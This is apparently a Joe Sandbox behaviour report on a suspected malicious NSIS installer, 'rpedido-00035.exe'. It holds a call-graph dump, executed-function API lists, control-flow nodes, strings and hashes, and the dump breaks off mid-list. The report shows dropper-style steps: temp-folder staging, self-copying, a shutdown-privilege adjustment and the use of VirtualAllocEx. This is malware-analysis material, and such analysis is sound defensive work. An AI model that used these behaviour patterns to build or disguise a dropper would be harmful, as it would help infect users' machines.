5745->5739 5746->5744 5746->5747 5751 4063d2 17 API calls 5746->5751 5753 4043ac 8 API calls 5747->5753 5752 404345 18 API calls 5749->5752 5750 4049d0 5755 405d89 18 API calls 5750->5755 5756 404930 SHBrowseForFolderW 5751->5756 5757 4048a1 5752->5757 5758 404b63 5753->5758 5759 40487b 5754->5759 5760 4049d6 5755->5760 5756->5744 5761 404948 CoTaskMemFree 5756->5761 5762 404345 18 API calls 5757->5762 5759->5749 5763 405c81 3 API calls 5759->5763 5801 4063b0 lstrcpynW 5760->5801 5764 405c81 3 API calls 5761->5764 5765 4048af 5762->5765 5763->5749 5766 404955 5764->5766 5799 40437a SendMessageW 5765->5799 5769 40498c SetDlgItemTextW 5766->5769 5774 4063d2 17 API calls 5766->5774 5769->5744 5770 4048b5 5772 40678a 5 API calls 5770->5772 5771 4049ed 5773 40678a 5 API calls 5771->5773 5772->5746 5781 4049f4 5773->5781 5775 404974 lstrcmpiW 5774->5775 5775->5769 5778 404985 lstrcatW 5775->5778 5776 404a35 5802 4063b0 lstrcpynW 5776->5802 5778->5769 5779 404a3c 5780 405d2c 4 API calls 5779->5780 5782 404a42 GetDiskFreeSpaceW 5780->5782 5781->5776 5784 405ccd 2 API calls 5781->5784 5786 404a8d 5781->5786 5785 404a66 MulDiv 5782->5785 5782->5786 5784->5781 5785->5786 5787 404afe 5786->5787 5788 404c99 20 API calls 5786->5788 5789 404b21 5787->5789 5790 40140b 2 API calls 5787->5790 5791 404aeb 5788->5791 5803 404367 EnableWindow 5789->5803 5790->5789 5793 404b00 SetDlgItemTextW 5791->5793 5794 404af0 5791->5794 5793->5787 5796 404bd0 20 API calls 5794->5796 5795 404b3d 5795->5747 5797 40476d SendMessageW 5795->5797 5796->5787 5797->5747 5798->5742 5799->5770 5800->5750 5801->5771 5802->5779 5803->5795 5804 10001058 5806 10001074 5804->5806 5805 100010dd 5806->5805 5807 10001516 GlobalFree 5806->5807 5808 10001092 5806->5808 5807->5808 5809 10001516 GlobalFree 5808->5809 5810 100010a2 5809->5810 5811 100010b2 5810->5811 5812 100010a9 GlobalSize 5810->5812 5813 100010b6 GlobalAlloc 5811->5813 5814 100010c7 5811->5814 5812->5811 5815 1000153d 3 API calls 5813->5815 5816 100010d2 GlobalFree 5814->5816 5815->5814 5816->5805 5817 401c19 5818 402c15 17 API calls 5817->5818 5819 401c20 5818->5819 5820 402c15 17 API calls 5819->5820 5821 401c2d 5820->5821 5822 402c37 17 API calls 5821->5822 5824 401c42 5821->5824 5822->5824 5823 401c52 5826 401ca9 5823->5826 5827 401c5d 5823->5827 5824->5823 5825 402c37 17 API calls 5824->5825 5825->5823 5828 402c37 17 API calls 5826->5828 5829 402c15 17 API calls 5827->5829 5830 401cae 5828->5830 5831 401c62 5829->5831 5832 402c37 17 API calls 5830->5832 5833 402c15 17 API calls 5831->5833 5834 401cb7 FindWindowExW 5832->5834 5835 401c6e 5833->5835 5838 401cd9 5834->5838 5836 401c99 SendMessageW 5835->5836 5837 401c7b SendMessageTimeoutW 5835->5837 5836->5838 5837->5838 5839 402a9a SendMessageW 5840 402ab4 InvalidateRect 5839->5840 5841 402abf 5839->5841 5840->5841 5842 40281b 5843 402821 5842->5843 5844 402829 FindClose 5843->5844 5845 402abf 5843->5845 5844->5845 5846 40149e 5847 4022f1 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5856 100010e1 5859 10001111 5856->5859 5857 100011d8 GlobalFree 5858 100012ba 2 API calls 5858->5859 5859->5857 5859->5858 5860 100011d3 5859->5860 5861 10001272 2 API calls 5859->5861 5862 10001164 GlobalAlloc 5859->5862 5863 100011f8 GlobalFree 5859->5863 5864 100011c4 GlobalFree 5859->5864 5865 100012e1 lstrcpyW 5859->5865 5860->5857 5861->5864 5862->5859 5863->5859 5864->5859 5865->5859 5866 4029a2 5867 402c15 17 API calls 5866->5867 5868 4029a8 5867->5868 5869 4029e8 5868->5869 5870 4029cf 5868->5870 5877 402885 5868->5877 5872 402a02 5869->5872 5873 4029f2 5869->5873 5871 4029d4 5870->5871 5879 4029e5 5870->5879 5880 4063b0 lstrcpynW 5871->5880 5875 4063d2 17 API calls 5872->5875 5874 402c15 17 API calls 5873->5874 5874->5879 5875->5879 5879->5877 5881 4062f7 wsprintfW 5879->5881 5880->5877 5881->5877 4386 4015a3 4387 402c37 17 API calls 4386->4387 4388 4015aa SetFileAttributesW 4387->4388 4389 4015bc 4388->4389 5882 4028a7 5883 402c37 17 API calls 5882->5883 5884 4028b5 5883->5884 5885 4028cb 5884->5885 5886 402c37 17 API calls 5884->5886 5887 405e7d 2 API calls 5885->5887 5886->5885 5888 4028d1 5887->5888 5910 405ea2 GetFileAttributesW CreateFileW 5888->5910 5890 4028de 5891 402981 5890->5891 5892 4028ea GlobalAlloc 5890->5892 5895 402989 DeleteFileW 5891->5895 5896 40299c 5891->5896 5893 402903 5892->5893 5894 402978 CloseHandle 5892->5894 5911 403441 SetFilePointer 5893->5911 5894->5891 5895->5896 5898 402909 5899 40342b ReadFile 5898->5899 5900 402912 GlobalAlloc 5899->5900 5901 402922 5900->5901 5902 402956 5900->5902 5904 4031ba 44 API calls 5901->5904 5903 405f54 WriteFile 5902->5903 5905 402962 GlobalFree 5903->5905 5909 40292f 5904->5909 5906 4031ba 44 API calls 5905->5906 5907 402975 5906->5907 5907->5894 5908 40294d GlobalFree 5908->5902 5909->5908 5910->5890 5911->5898 4780 40202c 4781 4020f0 4780->4781 4782 40203e 4780->4782 4784 401423 24 API calls 4781->4784 4783 402c37 17 API calls 4782->4783 4785 402045 4783->4785 4791 40224a 4784->4791 4786 402c37 17 API calls 4785->4786 4787 40204e 4786->4787 4788 402064 LoadLibraryExW 4787->4788 4789 402056 GetModuleHandleW 4787->4789 4788->4781 4790 402075 4788->4790 4789->4788 4789->4790 4803 4067f9 WideCharToMultiByte 4790->4803 4794 402086 4797 4020a5 4794->4797 4798 40208e 4794->4798 4795 4020bf 4796 405414 24 API calls 4795->4796 4799 402096 4796->4799 4806 10001759 4797->4806 4800 401423 24 API calls 4798->4800 4799->4791 4801 4020e2 FreeLibrary 4799->4801 4800->4799 4801->4791 4804 406823 GetProcAddress 4803->4804 4805 402080 4803->4805 4804->4805 4805->4794 4805->4795 4807 10001789 4806->4807 4848 10001b18 4807->4848 4809 10001790 4810 100018a6 4809->4810 4811 100017a1 4809->4811 4812 100017a8 4809->4812 4810->4799 4896 10002286 4811->4896 4880 100022d0 4812->4880 4817 1000180c 4823 10001812 4817->4823 4824 1000184e 4817->4824 4818 100017ee 4909 100024a4 4818->4909 4819 100017d7 4833 100017cd 4819->4833 4906 10002b57 4819->4906 4820 100017be 4822 100017c4 4820->4822 4828 100017cf 4820->4828 4822->4833 4890 1000289c 4822->4890 4830 100015b4 3 API calls 4823->4830 4826 100024a4 10 API calls 4824->4826 4831 10001840 4826->4831 4827 100017f4 4920 100015b4 4827->4920 4900 10002640 4828->4900 4835 10001828 4830->4835 4847 10001895 4831->4847 4931 10002467 4831->4931 4833->4817 4833->4818 4838 100024a4 10 API calls 4835->4838 4837 100017d5 4837->4833 4838->4831 4840 1000189f GlobalFree 4840->4810 4844 10001881 4844->4847 4935 1000153d wsprintfW 4844->4935 4845 1000187a FreeLibrary 4845->4844 4847->4810 4847->4840 4938 1000121b GlobalAlloc 4848->4938 4850 10001b3c 4939 1000121b GlobalAlloc 4850->4939 4852 10001d7a GlobalFree GlobalFree GlobalFree 4853 10001d97 4852->4853 4859 10001de1 4852->4859 4855 10001dac 4853->4855 4856 100020ee 4853->4856 4853->4859 4854 10001b47 4854->4852 4857 10001c1d GlobalAlloc 4854->4857 4854->4859 4862 10001c68 lstrcpyW 4854->4862 4863 10001c86 GlobalFree 4854->4863 4865 10001c72 lstrcpyW 4854->4865 4870 10002048 4854->4870 4874 10001cc4 4854->4874 4875 10001f37 GlobalFree 4854->4875 4878 1000122c 2 API calls 4854->4878 4945 1000121b GlobalAlloc 4854->4945 4855->4859 4942 1000122c 4855->4942 4858 10002110 GetModuleHandleW 4856->4858 4856->4859 4857->4854 4860 10002121 LoadLibraryW 4858->4860 4861 10002136 4858->4861 4859->4809 4860->4859 4860->4861 4946 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4861->4946 4862->4865 4863->4854 4865->4854 4866 10002148 4867 10002188 4866->4867 4879 10002172 GetProcAddress 4866->4879 4867->4859 4868 10002195 lstrlenW 4867->4868 4947 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4868->4947 4870->4859 4873 10002090 lstrcpyW 4870->4873 4873->4859 4874->4854 4940 1000158f GlobalSize GlobalAlloc 4874->4940 4875->4854 4876 100021af 4876->4859 4878->4854 4879->4867 4887 100022e8 4880->4887 4881 1000122c GlobalAlloc lstrcpynW 4881->4887 4883 10002410 GlobalFree 4884 100017ae 4883->4884 4883->4887 4884->4819 4884->4820 4884->4833 4885 100023ba GlobalAlloc CLSIDFromString 4885->4883 4886 1000238f GlobalAlloc WideCharToMultiByte 4886->4883 4887->4881 4887->4883 4887->4885 4887->4886 4889 100023d9 4887->4889 4949 100012ba 4887->4949 4889->4883 4953 100025d4 4889->4953 4892 100028ae 4890->4892 4891 10002953 VirtualAllocEx 4893 10002971 4891->4893 4892->4891 4894 10002a62 GetLastError 4893->4894 4895 10002a6d 4893->4895 4894->4895 4895->4833 4897 10002296 4896->4897 4898 100017a7 4896->4898 4897->4898 4899 100022a8 GlobalAlloc 4897->4899 4898->4812 4899->4897 4904 1000265c 4900->4904 4901 100026c0 4903 100026c5 GlobalSize 4901->4903 4905 100026cf 4901->4905 4902 100026ad GlobalAlloc 4902->4905 4903->4905 4904->4901 4904->4902 4905->4837 4908 10002b62 4906->4908 4907 10002ba2 GlobalFree 4908->4907 4956 1000121b GlobalAlloc 4909->4956 4911 10002506 MultiByteToWideChar 4916 100024ae 4911->4916 4912 1000252b StringFromGUID2 4912->4916 4913 1000253c lstrcpynW 4913->4916 4914 1000256c GlobalFree 4914->4916 4915 1000254f wsprintfW 4915->4916 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 100025a7 GlobalFree 4916->4917 4918 10001272 2 API calls 4916->4918 4957 100012e1 4916->4957 4917->4827 4918->4916 4961 1000121b GlobalAlloc 4920->4961 4922 100015ba 4923 100015c7 lstrcpyW 4922->4923 4925 100015e1 4922->4925 4926 100015fb 4923->4926 4925->4926 4927 100015e6 wsprintfW 4925->4927 4928 10001272 4926->4928 4927->4926 4929 100012b5 GlobalFree 4928->4929 4930 1000127b GlobalAlloc lstrcpynW 4928->4930 4929->4831 4930->4929 4932 10002475 4931->4932 4934 10001861 4931->4934 4933 10002491 GlobalFree 4932->4933 4932->4934 4933->4932 4934->4844 4934->4845 4936 10001272 2 API calls 4935->4936 4937 1000155e 4936->4937 4937->4847 4938->4850 4939->4854 4941 100015ad 4940->4941 4941->4874 4948 1000121b GlobalAlloc 4942->4948 4944 1000123b lstrcpynW 4944->4859 4945->4854 4946->4866 4947->4876 4948->4944 4950 100012c1 4949->4950 4951 1000122c 2 API calls 4950->4951 4952 100012df 4951->4952 4952->4887 4954 100025e2 VirtualAlloc 4953->4954 4955 10002638 4953->4955 4954->4955 4955->4889 4956->4916 4958 100012ea 4957->4958 4959 1000130c 4957->4959 4958->4959 4960 100012f0 lstrcpyW 4958->4960 4959->4916 4960->4959 4961->4922 5919 402a2f 5920 402c15 17 API calls 5919->5920 5921 402a35 5920->5921 5922 402a6c 5921->5922 5923 402885 5921->5923 5925 402a47 5921->5925 5922->5923 5924 4063d2 17 API calls 5922->5924 5924->5923 5925->5923 5927 4062f7 wsprintfW 5925->5927 5927->5923 5928 401a30 5929 402c37 17 API calls 5928->5929 5930 401a39 ExpandEnvironmentStringsW 5929->5930 5931 401a4d 5930->5931 5933 401a60 5930->5933 5932 401a52 lstrcmpW 5931->5932 5931->5933 5932->5933 5939 401db3 GetDC 5940 402c15 17 API calls 5939->5940 5941 401dc5 GetDeviceCaps MulDiv ReleaseDC 5940->5941 5942 402c15 17 API calls 5941->5942 5943 401df6 5942->5943 5944 4063d2 17 API calls 5943->5944 5945 401e33 CreateFontIndirectW 5944->5945 5946 40258c 5945->5946 5947 402835 5948 40283d 5947->5948 5949 402841 FindNextFileW 5948->5949 5950 402853 5948->5950 5949->5950 5951 4029e0 5950->5951 5953 4063b0 lstrcpynW 5950->5953 5953->5951 5954 401735 5955 402c37 17 API calls 5954->5955 5956 40173c SearchPathW 5955->5956 5957 4029e0 5956->5957 5958 401757 5956->5958 5958->5957 5960 4063b0 lstrcpynW 5958->5960 5960->5957 5961 10002a77 5962 10002a8f 5961->5962 5963 1000158f 2 API calls 5962->5963 5964 10002aaa 5963->5964 5965 4014b8 5966 4014be 5965->5966 5967 401389 2 API calls 5966->5967 5968 4014c6 5967->5968 5969 406aba 5973 40693e 5969->5973 5970 4072a9 5971 4069c8 GlobalAlloc 5971->5970 5971->5973 5972 4069bf GlobalFree 5972->5971 5973->5970 5973->5971 5973->5972 5974 406a36 GlobalFree 5973->5974 5975 406a3f GlobalAlloc 5973->5975 5974->5975 5975->5970 5975->5973

                                                          Executed Functions

                                                          Function 00403489 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 60 403642 52->60 61 40363d-403640 52->61 53->39 62 4036a8-4036b6 call 4063b0 53->62 54->37 54->57 55->56 56->28 64 4036a6 56->64 74 403930-403936 57->74 75 403810-403820 call 405a12 ExitProcess 57->75 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->45 61->45 61->60 69 4036bb 62->69 64->69 73 4037f6 65->73 77 4037b4-4037be 66->77 78 403768-40379d 66->78 69->29 73->57 80 4039b4-4039bc 74->80 81 403938-40394e GetCurrentProcess OpenProcessToken 74->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 90 4037a5-4037aa 82->90 91 4037ac-4037b0 82->91 84->83 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 88->89 102 4039a0-4039ab ExitWindowsEx 89->102 103 403994-40399e 89->103 90->91 95 4037b2 90->95 91->82 91->95 95->77 99->65 100->57 106 403863-403866 100->106 101->100 102->80 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->80 110 403868-40386d call 4058e3 106->110 111 40386f call 405960 106->111 115 403874-403882 SetCurrentDirectoryW 110->115 111->115 118 403884-40388a call 4063b0 115->118 119 40388f-4038b8 call 4063b0 115->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 138->126
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 004034AC
                                                          • GetVersion.KERNEL32 ref: 004034B2
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                          • OleInitialize.OLE32(00000000), ref: 00403529
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rpedido-00035.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                          • ExitProcess.KERNEL32 ref: 00403820
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\rpedido-00035.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038E3
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                          • ExitProcess.KERNEL32 ref: 004039C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins$C:\Users\user\Desktop$C:\Users\user\Desktop\rpedido-00035.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2488574733-1693202547
                                                          • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                          • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                          • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                          • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                          Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 484 405abe-405ae4 call 405d89 487 405ae6-405af8 DeleteFileW 484->487 488 405afd-405b04 484->488 489 405c7a-405c7e 487->489 490 405b06-405b08 488->490 491 405b17-405b27 call 4063b0 488->491 493 405c28-405c2d 490->493 494 405b0e-405b11 490->494 497 405b36-405b37 call 405ccd 491->497 498 405b29-405b34 lstrcatW 491->498 493->489 496 405c2f-405c32 493->496 494->491 494->493 499 405c34-405c3a 496->499 500 405c3c-405c44 call 4066f3 496->500 501 405b3c-405b40 497->501 498->501 499->489 500->489 508 405c46-405c5a call 405c81 call 405a76 500->508 504 405b42-405b4a 501->504 505 405b4c-405b52 lstrcatW 501->505 504->505 507 405b57-405b73 lstrlenW FindFirstFileW 504->507 505->507 509 405b79-405b81 507->509 510 405c1d-405c21 507->510 526 405c72-405c75 call 405414 508->526 527 405c5c-405c5f 508->527 513 405ba1-405bb5 call 4063b0 509->513 514 405b83-405b8b 509->514 510->493 512 405c23 510->512 512->493 524 405bb7-405bbf 513->524 525 405bcc-405bd7 call 405a76 513->525 516 405c00-405c10 FindNextFileW 514->516 517 405b8d-405b95 514->517 516->509 520 405c16-405c17 FindClose 516->520 517->513 521 405b97-405b9f 517->521 520->510 521->513 521->516 524->516 529 405bc1-405bca call 405abe 524->529 537 405bf8-405bfb call 405414 525->537 538 405bd9-405bdc 525->538 526->489 527->499 528 405c61-405c70 call 405414 call 406176 527->528 528->489 529->516 537->516 540 405bf0-405bf6 538->540 541 405bde-405bee call 405414 call 406176 538->541 540->516 541->516
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405AE7
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B2F
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B52
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B58
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B68
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                          • FindClose.KERNEL32(00000000), ref: 00405C17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
